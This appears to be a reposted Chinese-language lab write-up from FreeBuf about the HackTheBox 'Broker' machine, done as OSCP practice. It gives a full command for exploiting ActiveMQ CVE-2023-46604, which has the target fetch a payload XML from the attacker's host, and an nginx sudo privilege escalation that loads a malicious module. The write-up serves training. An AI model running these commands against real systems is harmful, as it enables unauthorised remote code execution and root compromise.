OSCP靶场103--Broker(HTB)
文章描述了一个攻击链的过程,包括信息搜集、突破边界和提权三个阶段。在信息搜集阶段,利用关键词搜索找到了漏洞CVE-2023-46604;在突破边界阶段使用Python脚本exploit.py进行攻击;提权过程中尝试了多种方法但难度较大。 2025-12-3 13:7:8 Author: www.freebuf.com(查看原文) 阅读量:0 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

搜集信息--突破边界--搜集信息,照做---提权

知识点

搜集信息

难度

简单(如果不是按照官方的教程做的话,是真的简单)

过程

信息收集

1764755396_693007c4c9ca752209e84.png!small?1764755394711

三个关键词

1764755504_69300830690e61d2fd6ea.png!small?1764755502372

这里不知道是什么版本,但有三个尝试点。都试过了,没成功。

admin   admin

1764756301_69300b4da5ec8d73a0feb.png!small?1764756299684

这个可访问,没出货。

挨着搜了一遍关键词,做了一些尝试,找到疑似漏洞。 能搜到的一般前三页就搜到了。

1764760696_69301c7865d68f3a73c28.png!small?1764760694493

这不是,一堆RCE,指向同一个:CVE-2023-46604

突破边界

找脚本即可

python exploit.py -i 10.129.2.13 -p 61616 -u http://10.10.14.116:8000/poc.xml

1764764763_69302c5b97714d14d8e9f.png!small?1764764761538

1764764804_69302c843000cec982585.png!small?1764764802043

提权1

1764764879_69302ccf8e084cdabf228.png!small?1764764878127

到这里才开始有点难度

一般遇到这种,先-h 看下命令参数

1764764997_69302d451606802c85c34.png!small?1764764994985

1764765053_69302d7d692c2d4d5e9d2.png!small?1764765051310

事实证明,这种的不一定具有特殊性,还真可以搜一下如何用 /usr/sbin/nginx 提权

1764765528_69302f582bff405343162.png!small?1764765525881

报错,无这个文件??

1764765660_69302fdc3c8ae75814321.png!small?1764765657946又报
1764765647_69302fcfda0a559195223.png!small?1764765645731
忘记生成了

1764765872_693030b07488732275ad4.png!small?1764765871293

ok

1764765785_693030596aa334c6a1e9e.png!small?1764765783235

也可以

sudo /usr/sbin/nginx -g "load_module /home/activemq/rootme.so; events {} http {}"

提权2

此处参照官方WP,仅为学习知识。

太难了看不懂,不写了

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/460278.html
如有侵权请联系:admin#unsafe.sh